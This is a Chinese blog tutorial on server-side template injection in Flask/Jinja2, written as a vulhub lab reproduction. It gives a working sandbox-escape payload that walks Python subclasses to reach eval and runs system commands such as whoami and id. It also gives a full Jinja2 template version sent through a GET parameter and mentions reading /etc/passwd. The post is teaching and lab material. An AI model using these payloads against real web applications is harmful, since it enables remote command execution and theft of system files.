Flask 模板注入漏洞

最新推荐文章于 2024-04-19 11:15:00 发布
最新推荐文章于 2024-04-19 11:15:00 发布
阅读量1.4k 收藏 1
点赞数 2
分类专栏: 安全测试:web\app\工具 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43650289/article/details/110871326
版权

目录

描述

环境安装flask

原理

沙盒逃逸方式进行命令执行

直接通过GET方式进行命令执行

过程

描述

Flask(也被称为“microframework”) 是一个微型的Python开发的Web框架,基于Werkzeug WSGI工具箱和Jinja2 模板引擎。 Flask使用起来非常简单,应用Extension增加其他功能:ORM、窗体验证工具、文件上传、各种开放式身份验证技术。

环境安装flask

>>> pip3 install Flask

>>> python3 hello.py

#hello.py
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
    return "Hello World!"
if __name__ =="__main__":
    app.run()

原理

Flask 依赖两个外部库: Jinja2 模板引擎和 Werkzeug WSGI 工具集。

  •    在模板环境中注册函数,可访问python中的一些内置函数及其方法;
  •    可利用Python 沙盒环境逃逸绕过注册方式,进而调用python内置对象;

以上就是flask模板注入漏洞的例子,使用template 函数去调用 name 参数;造成注入;

python3 flaskVul.py

http://127.0.0.1:5000/?name={{3*4}}  发现3x4等于12被执行了;使用get的请求方式调用name参数;证明存在漏洞

沙盒中常用的绕过注册的函数

__bases__    #以元组返回一个类直接所继承的类
__mro__      #以元组返回继承关系链
__class__    #返回对象所属的类
__globals__  #以dict返回函数所在模块命名空间中的所有变量
__subclasses__()  #以列表返回类的子类
_builtin_  #内建函数,python中可以直接运行一些函数,例如int(),list()等等,这些函数可以在__builtins__中可以查到。

PS:在py3中__builtin__被换成了builtin

沙盒逃逸方式进行命令执行

通过调用eval 函数,执行系统命令读取的方式,whoami

 

for c in [].__class__.__base__.__subclasses__():
    if c.__name__ == 'catch_warnings':
        for b in c.__init__.__globals__.values():
            if b.__class__ == {}.__class__:
                if 'eval' in b.keys():
                    data = b['eval']('__import__("os").popen("whoami").read()')
                    print(data)

更改一下获取的内容 cat /etc/passwd

直接通过GET方式进行命令执行

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

ps -ef

 

过程

搭建docker下的flask的注入漏洞环境,vulhub;

下载vulhub包从github上,找到flask目录ssti下

>>>docker-compose build

>>>docker-compose up -d

发生错误;进行排查

[root@localhost ssti]# systemctl status docker.service   查看状态,发现没起来

启动docker服务

service docker start

设置成自启动

systemctl enable docker.service

继续运行

通过”docker ps指令查看运行状态

进行访问使用payload:

 

 

战神/calmness
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Flask(Jinja2) 服务端模板注入漏洞
luvlettercl的博客
05-14 841
Flask是一个web框架,提供工具、库、技术来允许用户创建一个web应用程序,不依赖外部框架。 Jinja2是python中被广泛应用的模块引擎,由python实现的模块语言,Flask提供render_template函数封装了该模块引擎。 漏洞复现: 手工复现: 开启环境:docker-compose up -d 访问:http://192.168.0.27:8000 payload:url/?name={{3*3}} 出现 9 即代表SSTI漏洞存在 漏洞利用: ur..
Flask(Jinja2)服务端模板注入漏洞(SSTI)整理
qq_46145027的博客
04-19 1280
整理一下Flask框架下的SSTI漏洞相关知识
[python]浅谈Flask的SSTI漏洞
记录学习,一起进步
04-03 1218
[python]浅谈Flask的SSTI漏洞
flask ssti 模板注入
最新发布
zkaqlaoniao的博客
04-19 247
没有接触过flask框架的小伙伴看到可能会有点懵,简单分析一下,运行这个py文件就会启动web服务,默认在本机的5000端口,@app.route(‘/test’)?作用是找路由,这里是http://127.0.0.1:5000/test路径。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
Flask框架漏洞:SSTI
glass_york的博客
12-01 1311
SSTI 是 Server-Side Template Injection即 服务端模板注入,它是一种安全漏洞攻击技术。当应用程序在服务器端使用模板引擎来呈现动态生成的内容时,如果用户可以控制模板引擎的输入,就可能导致 SSTI 漏洞。在正常情况下,模板引擎被设计用于安全地将预定义的模板与数据进行组合,生成最终的输出。但是,SSTI 漏洞允许攻击者在应用程序的上下文中执行任意的服务器端代码。当攻击者能够通过用户输入或其他外部来源插入恶意的模板代码时,就会产生一系列问题。
flask框架漏洞
JJT
05-14 5179
在ctf里遇到了关于flask框架漏洞的题,此篇博文较为详细 转自https://www.jianshu.com/p/56614e46093e 一、简介 Flask 是一个使用 Python 编写的轻量级 Web 应用框架。Flask 依赖两个外部库: Jinja2模板引擎和WSGI 工具集。 1、常用概念 WSGI 只是一种接口,它只适用于 Python 语言,其全称为 Web Server Gateway Interface,定义了 web服务器和 web应用之间的接口规范。也就是说,只要 w.
欧美某俱乐部网站模板
01-20
10. **安全性与维护**:网站的安全性和定期维护也是重要环节,包括防止SQL注入、XSS攻击,以及定期备份和更新软件以修复安全漏洞。 总的来说,"欧美某俱乐部网站模板"涵盖了网页设计与开发的多个方面,包括设计原则...
连平FLASH音乐网
03-25
开发者需要注意SQL注入、跨站脚本攻击(XSS)等常见的网络安全威胁,并采取相应防护措施。 8. 性能优化:对于大量用户访问的音乐网,源码应考虑缓存策略、数据库查询优化等方法提高性能,减轻服务器压力。 9. 移动...
论坛模板及安装方法 可以看看
02-14
 14、去掉五子棋场和老虎机,修复社区银行存在的注入漏洞,大量插件可以去6K官方下载;  15、增加论坛中文繁体、更新论坛帮助,去掉后台选择分类状态功能;  16、美化了后台功能界面和音乐后台登陆程序  17、个人...
xss-vuln学习通关总结
08-24
XSS(Cross-site scripting)是一种常见的网络安全漏洞,主要表现为黑客通过注入恶意脚本到网页中,从而在用户浏览网页时控制用户的浏览器。这种攻击最初因为涉及跨域而得名,但随着JavaScript的发展和前端应用的...
QQ先生超级美化FLASH游戏频道 -ASP源码.zip
02-09
- **安全配置**:对源码进行安全审计,修复可能存在的漏洞,例如更新SQL查询以防止注入攻击,对用户输入进行过滤或转义。 - **性能优化**:检查代码效率,减少不必要的数据库查询,优化图片和CSS/JS资源,提高网站...
Flask SSTI漏洞介绍及利用
JCPS_Y的博客
10-23 2646
Flask SSTI漏洞介绍及利用
【WEB攻防】Flask(Jinja2) 服务端模板注入漏洞 原理+防御
AAAAAAAAAAAA66的博客
12-19 6441
前面写CTF题目的时候做过几道SSTI模板注入的题目。最近又遇到了一个不错的CTF网站, http://bmzclub.cn 里面不但有CTF题目,更重要的是有漏洞环境,不需要自己去一个一个去安装,对于我这样的懒人简直是福音。 目录 Flask模板注入简介 Flask和Jinja2介绍: 注入原理 复现 手动注入 工具探测 Flask模板注入简介 Flask和Jinja2介绍: 1.Flask是一个轻量级的基于Python的web框架。 2.Jinja 模板只是一个属于.
SSTI漏洞基础解析
weixin_43895765的博客
04-01 5505
🚩flask基础 flask是python编写的一个WEB应用程序框架,flask由Armin Ronacher带领的一个Pocco团队开发,flask基于werkzeug WSGI工具包个jinjia2模板引擎~ WSGI:Web Server Gateway Interface 即WEB服务器网关接口 🚩第一个flask程序 # 从flask中导入Flask,注意,flask是包名,Flask是模块名 from flask import Flask # 初始化Flask app = Flask(
flask SSTI漏洞
jiet07的博客
08-07 3993
文章目录第一章flask ssti漏洞的代码(长什么样子)第二章 前言(基础知识储备)第三章 服务器端模板(SST)第四章 服务器模板注入(SSTI)第五章 例子(CTF)第五章 如何防御服务器模板注入参考资料附录 第一章flask ssti漏洞的代码(长什么样子) 1.1 代码 from flask import Flask from flask import request from flask import render_template_string from flask import render
Flask (Jinja2) 服务端模板注入漏洞复现
来日可期的博客
10-15 1003
模板引擎中,开发者可以使用特定的语法将数据与模板结合生成最终的输出。然而,如果在这个过程中,直接使用用户提供的数据而没有进行适当的过滤或转义,攻击者就可以注入恶意模板代码。攻击者可以构造恶意的输入,在用户输入中包含模板标记(如 `{{}}`),以控制模板引擎的行为。模板引擎会将用户提供的数据作为代码来执行,导致恶意代码执行在服务端上下文中
Flask框架中常规漏洞防范方法
ALLEN'Blog
01-05 708
Double Fetch是一种条件竞争类型的漏洞,其主要形成的原因是由于用户态与内核态之间的数据在进行交互时存在时间差,我们在先前的学习中有了解到内核在从用户态中获取数据时会使用函数copy_from_user,而如果要拷贝的数据过于复杂的话则内核会选择引用其指针而将数据暂存于用户态中等待后续处理,而在这时数据会存在被条件竞争修改原有数据的风险,也就是笔者要分享的Double Fetch的由来。
flask ssti漏洞复现
yougexiaojiuguan的博客
11-20 123
记录漏洞复现过程
nand flash FTL模板
02-26
NAND Flash是一种非易失性存储器件,由于其高速、低功耗、低成本等特点,已经成为现代电子设备中最常用的存储媒介。在使用NAND Flash进行数据存储时,需要使用Flash Translation Layer(FTL)来管理其物理块(PBA)和逻辑块(LBA)之间的映射关系。以下是一个简单的NAND Flash FTL模板,以供参考: ```python class FTL: def __init__(self, n_blocks, block_size, page_size): self.n_blocks = n_blocks # 总物理块数 self.block_size = block_size # 每个物理块的大小 self.page_size = page_size # 每个物理块中的页面大小 self.lba_to_pba = {} # LBA到PBA的映射表 self.free_blocks = set(range(n_blocks)) # 空闲物理块集合 def write(self, lba, data): # 检查是否需要新分配物理块 if lba not in self.lba_to_pba: if not self.free_blocks: raise Exception('Out of space!') pba = self.free_blocks.pop() self.lba_to_pba[lba] = pba pba = self.lba_to_pba[lba] # 写数据到物理块中 # ... def read(self, lba): if lba not in self.lba_to_pba: raise Exception('Block not found!') pba = self.lba_to_pba[lba] # 从物理块中读取数据 # ... def erase(self, lba): if lba not in self.lba_to_pba: raise Exception('Block not found!') pba = self.lba_to_pba[lba] # 擦除物理块 # ... self.free_blocks.add(pba) del self.lba_to_pba[lba] ``` 在这个模板中,我们使用一个字典`lba_to_pba`来记录LBA和PBA之间的映射关系。在写入数据时,如果该LBA没有对应的PBA,则需要从空闲物理块中选择一个新的物理块,并将其分配给该LBA。在读取数据时,我们可以从`lba_to_pba`中查找该LBA对应的PBA,并从该PBA中读取数据。在擦除数据时,我们需要擦除该LBA对应的PBA,并将该PBA重新加入到空闲物理块集合中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

战神/calmness

你的鼓励是我最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值